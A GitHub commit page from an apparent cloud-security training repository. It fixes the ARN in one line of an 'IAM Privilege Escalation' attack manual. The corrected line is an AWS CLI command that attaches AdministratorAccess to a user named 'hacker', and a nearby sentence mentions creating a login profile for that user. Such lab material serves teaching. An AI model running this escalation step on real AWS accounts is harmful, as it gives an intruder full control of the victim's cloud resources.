Skip to content

Commit

Permalink
Fix AdministratorAccess ARN
Browse files Browse the repository at this point in the history
  • Loading branch information
SomeKirill authored Apr 23, 2023
1 parent 76567df commit 1cc7515
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion attack-manuals/module-1/07-IAM Privilege Escalation.md
Original file line number Diff line number Diff line change
Expand Up @@ -252,7 +252,7 @@ Run-
Command:

```bash
aws iam attach-user-policy --user-name hacker --policy-arn arn:aws:iam:policy/AdministratorAccess
aws iam attach-user-policy --user-name hacker --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
```

Let's create a login profile for "hacker" user with the help of the following command.
Expand Down

0 comments on commit 1cc7515

Please sign in to comment.